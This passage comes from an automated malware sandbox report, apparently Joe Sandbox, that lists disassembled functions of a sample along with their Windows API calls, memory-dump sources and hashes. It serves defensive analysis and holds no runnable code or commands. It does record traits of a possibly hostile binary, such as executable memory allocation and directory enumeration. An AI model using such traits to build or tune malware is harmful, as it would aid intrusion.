                                                                                                    • Opcode Fuzzy Hash: 63764ec46d9072077bb2310c3d7b93540037b1d0e61723773494fb04645fb444
                                                                                                    • Instruction Fuzzy Hash: A0F0E939609E24A7DF311F729D05B5A3B5BBF637B1B158015FC04E6192CB70D80086E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A3BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00196A99,?,0000015D,?,?,?,?,001985D0,000000FF,00000000,?,?), ref: 001A3BE2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: ce4f1028f028ecd79e257374531e57818d656f19cb5906ae3eaaa015e3b733f0
                                                                                                    • Instruction ID: 4b3856a45538ec981fab3428ab11e94ac249fb9b20d0a5c4f57ac334c2638b3e
                                                                                                    • Opcode Fuzzy Hash: ce4f1028f028ecd79e257374531e57818d656f19cb5906ae3eaaa015e3b733f0
                                                                                                    • Instruction Fuzzy Hash: 17E0E53920421097DB212B669C04F5A365BEB037E0F250121FC25E2091DB31DE0082F1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001763DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 30853b41bf27274c25117a808a4f8a590950231f10d58a601d6d801f9308a2f4
                                                                                                    • Instruction ID: 5bf4296148bd873fa4e7b38abfbb167d32f359e4d91a8d8af8312863f849211f
                                                                                                    • Opcode Fuzzy Hash: 30853b41bf27274c25117a808a4f8a590950231f10d58a601d6d801f9308a2f4
                                                                                                    • Instruction Fuzzy Hash: 9DF01571101B12CFCB399F64D894852BBF5BF1432A324897EE1DB82620C731A840DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001C6A79 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: 0c81dc36f765ef27acd3fa525127fedc690c559d9010926208fa0ffab8212e03
                                                                                                    • Instruction ID: b438080bcc99deee6ba9d29920becd7b3e0015bb17bad3960fb703010f5bf17a
                                                                                                    • Opcode Fuzzy Hash: 0c81dc36f765ef27acd3fa525127fedc690c559d9010926208fa0ffab8212e03
                                                                                                    • Instruction Fuzzy Hash: C3F0E572B046006ADB206AB49805FB2B7E8AB20315F14881ED4C582181C7B2D4949B52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A510A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 001A512C
                                                                                                      • Part of subcall function 001A2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,001ADB71,00241DC4,00000000,00241DC4,00000000,?,001ADB98,00241DC4,00000007,00241DC4,?,001ADF95,00241DC4), ref: 001A2D6E
                                                                                                      • Part of subcall function 001A2D58: GetLastError.KERNEL32(00241DC4,?,001ADB71,00241DC4,00000000,00241DC4,00000000,?,001ADB98,00241DC4,00000007,00241DC4,?,001ADF95,00241DC4,00241DC4), ref: 001A2D80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353095263-0
                                                                                                    • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                    • Instruction ID: 10852f78544ca26f4f4ce8853cdd8ede1a89e29111468ea3064d140846ad45d0
                                                                                                    • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                    • Instruction Fuzzy Hash: 5CE0927A2007059F8720CF6CD800A92BBF5EF963207208529E89ED7221D371E812CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                    • Instruction ID: d9899a047a849275aa2493cdc6a550d75f0a0f718ae59871cf45780c46d5e269
                                                                                                    • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                    • Instruction Fuzzy Hash: 8FF0F87140420DFFDF05DF90C941E9E7BB9FB14318F208545F9199A151D336DA21EBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00174154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 176396367-0
                                                                                                    • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                    • Instruction ID: 793c3b134072d77b6b21f978fdd1bd2a4c8e20d7f1b0507c42e97bd72cff67cf
                                                                                                    • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                    • Instruction Fuzzy Hash: 02D0A7333420103ABA69313D2D0BC7F455CCFE26A0B04007FFA02CA1A5EE444C0301E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DE783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 001DE7A2
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NamePathShort_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2021730007-0
                                                                                                    • Opcode ID: 822d58fd26f4815cebb7cd031c65987792cdb79af42ed541fc91dc4f4ff46414
                                                                                                    • Instruction ID: d2e0ab58c764ff07d4e3c2173f341bda4d875482975948759f17971b600a685e
                                                                                                    • Opcode Fuzzy Hash: 822d58fd26f4815cebb7cd031c65987792cdb79af42ed541fc91dc4f4ff46414
                                                                                                    • Instruction Fuzzy Hash: 41E0CD765402245BC710A2989C09FDA77EDEFC8790F0440B0FC09D7249DEA4DD808590
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0018F13C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,0017B0DE,?,?,00000000,?,00176B73,?), ref: 0018F156
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 49897953a921158fee55a73ef869a36e897759896ef727a080c30e153477b328
                                                                                                    • Instruction ID: d5a010a12e405f500ae33840f0b6caacbe0ffa5b5326bf968652f16a9abf8ee5
                                                                                                    • Opcode Fuzzy Hash: 49897953a921158fee55a73ef869a36e897759896ef727a080c30e153477b328
                                                                                                    • Instruction Fuzzy Hash: 2AE092B5510704AFD728DF55D84AD97BBF8EB08310B00455EA85693740E7B1BD448B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001739DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001739FD
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 541455249-0
                                                                                                    • Opcode ID: d2237e0d644df1c5d1649bdf53871f5b10a3bdf9fd58f85dcb204b6f6fe923cd
                                                                                                    • Instruction ID: 9f5824bb0a8d6d7dfc231b4747f8c47bb38916fd1900f37278c1173622a93737
                                                                                                    • Opcode Fuzzy Hash: d2237e0d644df1c5d1649bdf53871f5b10a3bdf9fd58f85dcb204b6f6fe923cd
                                                                                                    • Instruction Fuzzy Hash: 78E0CD725002245BC710A2989C09FDA77EDDFC8790F0441B1FC09D7249DEB4DD808590
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DE753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001DE76C
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderPath_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2987691875-0
                                                                                                    • Opcode ID: f2986be18967922a22e9eb29b9ba4db21f7ba09af9be8dbf815cbf0437dcc1d8
                                                                                                    • Instruction ID: c29898671d71c61d8604db28a498b44ab71bd3d023346432d9103fe1f3b77470
                                                                                                    • Opcode Fuzzy Hash: f2986be18967922a22e9eb29b9ba4db21f7ba09af9be8dbf815cbf0437dcc1d8
                                                                                                    • Instruction Fuzzy Hash: 1FD05EA19003282BDF60A6B49C0DDB73AACD740210F004AA0786DD3142EA74ED4486B0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00177953 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000,001B3A1C), ref: 00177973
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 2591292051-0
                                                                                                    • Opcode ID: ed8c8bb0d480f36ce9ede271e68d43f39c33596b52d23e50cee7e827911679aa
                                                                                                    • Instruction ID: 53bfe719021e12418e9eac7ed4b66aa3536b58348cd4be6b109412e3a559d07f
                                                                                                    • Opcode Fuzzy Hash: ed8c8bb0d480f36ce9ede271e68d43f39c33596b52d23e50cee7e827911679aa
                                                                                                    • Instruction Fuzzy Hash: 92E09275405B12CFC3314F1AE804412FBF4FED23757218A2ED1E9826A0D3B05896CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001B073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,001B0AA4,?,?,00000000,?,001B0AA4,00000000,0000000C), ref: 001B0757
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 70b35d97930651fd4f1cbf36a8d150b0e2f3ee660ac994e6d5aee209eca7a915
                                                                                                    • Instruction ID: 5109ff895e6af6363f831bcae22ed507dd119fe4b50a7437aabaa335f926c8e0
                                                                                                    • Opcode Fuzzy Hash: 70b35d97930651fd4f1cbf36a8d150b0e2f3ee660ac994e6d5aee209eca7a915
                                                                                                    • Instruction Fuzzy Hash: ADD06C3200020DBBDF028F84ED06EDA3BAAFB48714F014000BE1856020C732E821AB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DE9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,001DD755), ref: 001DE9C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 72967a3d8d88521b8e032d8d7698b507c00277c8893895e776e94fabbf7985d7
                                                                                                    • Instruction ID: b3cbc7f3abf30b2223e6eb71efa5981aee25b0cd66038050dd896e088dbd1429
                                                                                                    • Opcode Fuzzy Hash: 72967a3d8d88521b8e032d8d7698b507c00277c8893895e776e94fabbf7985d7
                                                                                                    • Instruction Fuzzy Hash: A2B0922400261009BD7C2A3C2A2C1A9278068433AB7DC1B96E8B9992E3C33A880BE610
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010DE9A0 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,010DE603,0000003C,0000001E,0000004A,0000003E,00000042), ref: 010DE9BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010D9000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction ID: ec27869c955d1737f073870aebe05b0b2b35fae0e4b44743f570745af984d6a6
                                                                                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction Fuzzy Hash: 5ED012B018530276F691BBB1CC02F99BA91AF50B42F402C58B3DC3C1E1C5BA95595A96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010DE9A0 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,010DE603,0000003C,0000001E,0000004A,0000003E,00000042), ref: 010DE9BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010DB000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction ID: ec27869c955d1737f073870aebe05b0b2b35fae0e4b44743f570745af984d6a6
                                                                                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction Fuzzy Hash: 5ED012B018530276F691BBB1CC02F99BA91AF50B42F402C58B3DC3C1E1C5BA95595A96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010DE9A0 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,010DE603,0000003C,0000001E,0000004A,0000003E,00000042), ref: 010DE9BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction ID: ec27869c955d1737f073870aebe05b0b2b35fae0e4b44743f570745af984d6a6
                                                                                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction Fuzzy Hash: 5ED012B018530276F691BBB1CC02F99BA91AF50B42F402C58B3DC3C1E1C5BA95595A96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 001EA0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 001EA11B
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 001EA176
                                                                                                    • FindClose.KERNEL32(00000000), ref: 001EA181
                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 001EA19D
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001EA1ED
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00237B94), ref: 001EA20B
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001EA215
                                                                                                    • FindClose.KERNEL32(00000000), ref: 001EA222
                                                                                                    • FindClose.KERNEL32(00000000), ref: 001EA232
                                                                                                      • Part of subcall function 001DE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001DE2C9
                                                                                                    Strings
                                                                                                    Memory Dump Source
